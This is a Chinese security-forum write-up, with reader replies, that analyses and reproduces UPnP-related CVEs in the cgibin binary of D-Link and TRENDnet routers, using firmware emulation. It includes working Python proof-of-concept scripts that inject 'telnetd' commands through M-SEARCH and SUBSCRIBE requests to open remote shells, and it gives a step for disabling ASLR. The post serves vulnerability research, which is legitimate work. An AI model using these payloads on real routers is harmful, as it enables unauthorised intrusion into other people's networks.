首页
社区
课程
招聘
[原创] cgibin中与upnp协议有关的一些漏洞分析与复现
发表于: 2022-5-6 21:19 40955

[原创] cgibin中与upnp协议有关的一些漏洞分析与复现

2022-5-6 21:19
40955

UPNP,全称为:Universal Plug and Play,中文为:通用即插即用,是一套基于TCP/IPUDPHTTP的网络协议。

简单来说,就和它的名字一样,UPNP的目的就是为了在某个设备接入网络后,该网络中的所有设备都知道有新设备加入,这些设备之间能互相沟通,甚至可直接使用或控制对方。

UPNP的一大亮点就是,只要某设备支持并开启了UPNP,当主机向其发出端口映射请求的时候,该设备就会自动为主机分配端口并进行端口映射

D-LinkTRENDnetapache struct的路由器的/htdocs目录下都存在一个cgibin二进制文件,它会有很多.cgi文件的软链接,通过运行这些软链接,其名字会作为第一个参数传入cgibin,就会调用到cgibin中对应的函数。

cgibin会作为 “请求验证文件” ,对用户的请求进行验证并解析,再将解析后的数据传给对应的文件,进行下一步的操作。

下图为UPNP协议栈的结构示意图:

可以看到其中的 SSDP(简单服务发现协议),SOAP(简单对象访问协议)与GENA(通用事件通知体系) ,其分别对应ssdpcgi(在/htdocs/upnp目录下),soap.cgi(在/htdocs/upnp/docs/LAN-1目录下),gena.cgi(在/htdocs/upnp/docs/LAN-1目录下),本文也主要是分析这几个cgicgibin中对应函数的漏洞。

由于牵涉到UPNP协议,用qemu来模拟是比较复杂的,需要手动初始化一些东西,因此笔者为了方便,选择使用FAP来仿真模拟固件运行,这个平台基于firmadyne,对其做了一些优化及改进,GitHub的项目地址为:firmware-analysis-plus

该平台的优点是:可以做到一键仿真模拟固件运行,缺点是:适配性较差,最好在Kali上安装使用,笔者所用的物理机是Kali 2021.11的版本。

此外,经过笔者测试,该平台对大部分MIPS架构的固件模拟都没有问题,但是对部分ARM架构(特别是D-Link系列高版本路由)的固件模拟好像会出一些问题。

关于ARM无法成功仿真模拟的问题,笔者已经在github上提交了issue咨询了作者,并且得到了回复:

笔者后来又找到了另一个优秀的“固件仿真框架”EMUX,这是一个基于docker的框架,主要针对于arm架构的仿真模拟,近期也支持了mips架构,根据官方的描述,可以对DIR860以上的arm架构路由进行模拟运行。

2022.5.7更新:

这篇文章其实是挺久前写的了,昨天刚发出来,今天就收到了FAP项目作者的回复,说是已经修复了D-Link系列高版本arm路由无法仿真的问题:

笔者立即测试了一下,的确是修复了该问题,接着,笔者又尝试用FAP模拟运行了TP-LinkTenda等品牌中多款arm的固件,都能够成功。

从目前各方面综合来看,FAP项目是仿真模拟IoT固件的极好的选择。

注:以下复现的CVE所影响的路由器为D-Link DIR-859及以下的版本,以及部分D-Link DIR-859以上的较低小版本,TRENDnet的很多路由器因框架相同,也受其影响。

漏洞信息:CVE-2020-15893

这个CVEssdpcgi有关,我们先来分析cgibin中的ssdpcgi_main函数,可以很轻松地定位到可能的漏洞点在LABEL_17这里:

进入lxmldbc_system函数:

可以看到这里是用vsnprintf对传进来的格式化字符串进行了拼接,其中va是通过va_arg取当前栈上的元素组成的va_list,通过动态调试不难发现,这里取的栈上的元素就是存放在栈上的环境变量:

在真机环境中,这里只有HTTP_ST是我们可控的。

当我们向HTTP_ST注入恶意指令,那么拼接好的字符串v6作为system参数,就可以导致任意命令执行(RCE)漏洞了。

再回到ssdpcgi_main详细分析一下该如何构造payload

可以发现,进行一堆匹配验证,最后的格式化字符串只有下面两个会多出一个参数%s的拼接,我们再看到汇编:

这里的第二个参数为/etc/scripts/upnp/M-SEARCH.sh,第三四个参数可以往上查找到,分别是REMOTE_ADDRREMOTE_PORT

结合格式化字符串,可以猜测并通过动调验证出,最后在lxmldbc_system函数中拼接好的system的参数应为 /etc/scripts/upnp/M-SEARCH.sh XXX REMOTE_ADDR:REMOTE_PORT SERVER_ID HTTP_ST & ,因此,想要造成RCE,也就是要让HTTP_ST拼接上去,就必须要选用后面两个格式化字符串(deviceservice),也就需要之前有urn:才行。

综上,我们初步构造的payload可以是向HTTP_ST注入urn:device:;telnetd -p 8888,由于此busybox自带了telnetd,这里用telnetd开一个端口,再从主机远程登陆进去是最方便的。

我们知道ssdpcgiUPNP协议有关,也就是要发送报文到UPNP相关的端口,所以先用FAP模拟运行起固件,然后打开/var/run/httpd.conf文件,可以找到:

也就是说,要1900端口发送报文,才能走到ssdpcgi

然而,发送一段报文,肯定是需要请求方式的,在cgibin中不好直接看出来,可以到/usr/sbin/upnp文件中去找ST字段的关键词定位:

可以看到sub_41BFDC函数中有对其的操作,再交叉引用到调用sub_41BFDCsub_41C2A0函数,这里要求我们的请求方式是M-SEARCH

上图中的v10是调用ILibParsePacketHeadera1 + 108的数据包解析的结果,而a1 + 108是接收到的socket套接字储存的地方:

sub_415C9C中也可以看到,把socket绑定到了1900端口:

再回到有对ST字段进行匹配操作的sub_41BFDC函数,可以看到首先需要绕过下面圈出的判断,这里的1.1显然就是HTTP版本:

综上,从upnp二进制文件中可以看到,我们得是M-SEARCH请求方式,故:报文头应为M-SEARCH * HTTP/1.1

POC:

最终成功开启了8888端口,利用telnet远程登陆到了路由器固件中,可执行任意命令:

通过ps命令查看进程,可以发现telnetd -p 8888命令的确已经被成功执行:

漏洞信息:CVE-2019-17621

这个漏洞与gena.cgi有关,还是先看到cgibin中的genacgi_main函数:

可以看到v5service=后面的内容,再先看到SUBCRIBE请求方式对应的sub_41A390函数:

看到这里,拼接好的字符串v16作为了xmldbc_ephp的参数,xmldbc_ephp函数在这里显然就是运行了/htdocs/upnp/run.NOTIFY.php文件,于是,我们再来分析这个文件:

SID为空的时候,调用了GENA_subscribe_new函数,这个函数在/htdocs/upnpinc/gena.php中:

这里有对HOST的检查,然后最后调用到了GENA_notify_init函数:

在最后,将$shell_file写入了shell文件中,不难想到,可以通过控制shell_file达成任意命令执行。

再看回到sub_41A390函数中,既然HTTP_SID必须为空才能走到漏洞点,那么自然就走到了else分支:

这些检查都需要绕过,才能走到xmldbc_ephp函数:

这里的SHELL_FILE中可控参数a1就是从genacgi_main传进来的参数v5,也就是service=后面的内容。

综上,可以通过对service注入恶意指令,造成RCE漏洞

至此,我们知道了报文的请求方式得是SUBSCRIBE才能触发漏洞,至于UNSUBSCRIBESID不为空的情况可以自行审一遍代码,很容易看出是行不通的。

接下来要做的就是找的对应的UPNP端口,先找gena.cgi在哪里,看到/etc/services/HTTP/httpsvcs.php文件:

这里将cgibin的软链接建到了/var/htdocs/upnp/目录下,而这个目录也有软链接,为/htdocs/upnp/docs

得到了这些信息,再看到/var/run/httpd.conf文件:

可以看到,需要向49152端口发送报文

POC:

这里拿socketpwntools来打都是OK的:

或者直接nc49152端口手动发送报文:

漏洞信息:CVE-2018-6530

这个漏洞是在soap.cgi中的,还是看到cgibin中的soapcgi_main函数:

首先需要绕过一些检查,比如CONTENT_TYPE得是text/xmlREQUEST_METHOD得是POSTHTTP_SOAPACTION中得有#等,可以看到这里对service后的内容已经进行了一些过滤,但是 貌似忘记过滤了&符号

接着往下看:

这里的cgibin_parse_request已经很熟悉了,就是对POST内容的解析,在这里用处不大,就注意设置一下相关环境变量即可。

再下面就来到漏洞点了:

这个fopen的第二个参数是a+,文件不存在就会创建,所以这个if很好判断过,下面的sprintf + system很显然存在一个任意命令执行的RCE漏洞。

之前说过,&忘记过滤了,因此我们可以用&&连接恶意命令并注入到service中,由于之前的sh /var/run/是个合法路径,因此算执行成功,可以走到&&之后的恶意命令。

在上一个CVE中已经分析过了,soap.cgi也是通过49152端口发送报文给UPNP

POC:

漏洞信息:CVE-2022-25106

这个漏洞仍然是在gena.cgi中,不过这次是存在缓冲区溢出的漏洞:

上图是当为UNSUBSCRIBE请求方式时走到的函数,很容易看出存在一处栈溢出的漏洞,且当请求方式为SUBSCRIBE时,也存在同样的栈溢出漏洞。

需要提一下的就是,这里的SERVER_ID环境变量可以从httpd.conf文件中看到:

这个环境变量本身就不为空,也不是我们可控的,在这个栈溢出漏洞中,我们可以serviceHTTP_SID进行payload的注入,进行漏洞利用或造成拒绝服务。

这里需要注意的是:用FAP启动好固件后,需要用echo 0 > /proc/sys/kernel/randomize_va_space命令关闭地址随机化(ASLR,因为在真机环境中就是没开ASLR的,也方便我们接下来的复现:

POC-1:

UNSUBSCRIBE的请求方式,对service进行了注入。

成功地远程登陆到了路由固件中:

检测到23号端口的telnet服务已被开启:

POC-2:

这个脚本在firmadyne模拟的环境中是打不通的,原因未知,可能是shellcode过长,到了一些不可执行区,但是在真机环境是可以打通的。

这里用的是SUBSCRIBE的请求方式,对service进行了注入。

POC-3:

发现DIR-860L v2.03竟然还存在这个漏洞,于是也打了一下,这里注入的是HTTP_SID,又由于uClibc版本换了,所以gadget也有些变化:

POC-4:

发现DIR-880L v1.0虽然架构换成了armel,但是这个漏洞仍然是存在的。

不过,FAP对部分arm架构的固件的仿真运行有些问题,笔者也还不太会用EMUX,没成功启动固件,目前又没有真机的测试条件,就先贴一下POC(这里的gadget在本地的qemu测试过,是可以跑通的):

2022.5.7更新:FAP项目作者已经修复了D-LINK系列高版本arm路由无法仿真模拟的问题,下面给出的是最终测试通过的POC

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
# python3
from socket import *
from os import *
from time import *
 
payload = b'M-SEARCH * HTTP/1.1\r\n'
payload += b'HOST:localhost:1900\r\n'
payload += b'ST:urn:device:;telnetd -p 8888\r\n\r\n'
 
s = socket(AF_INET, SOCK_DGRAM, 0)
s.sendto(payload, ("192.168.10.1", 1900))
s.close()
 
sleep(1)
system("telnet 192.168.10.1 8888")
# python3
from socket import *
from os import *
from time import *
 
payload = b'M-SEARCH * HTTP/1.1\r\n'
payload += b'HOST:localhost:1900\r\n'
payload += b'ST:urn:device:;telnetd -p 8888\r\n\r\n'
 
s = socket(AF_INET, SOCK_DGRAM, 0)
s.sendto(payload, ("192.168.10.1", 1900))
s.close()
 
sleep(1)
system("telnet 192.168.10.1 8888")
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
from pwn import *
from socket import *
from os import *
from time import *
 
request = b"SUBSCRIBE /gena.cgi?service=" + b"`telnetd -p 7777`" + b" HTTP/1.1\r\n"
request += b"Host: localhost:49152\r\n"
request += b"Callback: http:///\r\n"
request += b"NT: upnp:event\r\n"
request += b"Timeout: Second-2333\r\n\r\n"
 
s = socket(AF_INET, SOCK_STREAM)
s.connect((gethostbyname("192.168.0.1"), 49152))
s.send(request)
 
#io = remote("192.168.0.1", 49152)
#io.send(request)
 
sleep(1)
os.system('telnet 192.168.0.1 7777')
from pwn import *
from socket import *
from os import *
from time import *
 
request = b"SUBSCRIBE /gena.cgi?service=" + b"`telnetd -p 7777`" + b" HTTP/1.1\r\n"
request += b"Host: localhost:49152\r\n"
request += b"Callback: http:///\r\n"
request += b"NT: upnp:event\r\n"
request += b"Timeout: Second-2333\r\n\r\n"
 
s = socket(AF_INET, SOCK_STREAM)
s.connect((gethostbyname("192.168.0.1"), 49152))
s.send(request)
 
#io = remote("192.168.0.1", 49152)
#io.send(request)
 
sleep(1)
os.system('telnet 192.168.0.1 7777')
 
 
 
 
 
 
 

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

最后于 2022-5-7 17:14 被winmt编辑 ,原因: FAP项目已经修复了无法仿真模拟部分arm架构固件的问题
收藏
免费 16
支持
分享
打赏 + 151.00雪花
打赏次数 2 雪花 + 151.00
 
赞赏  seana   +1.00 2022/08/24
赞赏  Editor   +150.00 2022/06/14 恭喜您获得“雪花”奖励,安全圈有你而精彩!
最新回复 (5)
雪    币: 1760
活跃值: (823)
能力值: ( LV3,RANK:38 )
在线值:
发帖
回帖
粉丝
2
师傅想问一下CVE-2022-25106 分析中,函数sub_40E9BC是怎么分析出来的,师傅用的是哪个版本的固件?在分析1.05b的时候,看不到sub_40E9BC这个函数
2022-8-14 17:33
0
雪    币: 14653
活跃值: (17749)
能力值: ( LV12,RANK:290 )
在线值:
发帖
回帖
粉丝
3

感谢分享,我何时才能变得和你一样优秀

最后于 2022-9-2 16:53 被pureGavin编辑 ,原因:
2022-9-2 16:49
0
雪    币: 16
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
4
太强了 我何时才能分析到这个程度
2022-9-23 17:11
0
雪    币: 1221
活跃值: (1167)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
5
IOTの真神!
2023-5-11 22:30
0
雪    币: 173
活跃值: (245)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
IOTの真神!
2023-10-12 21:17
0
游客
登录 | 注册 方可回帖
返回
//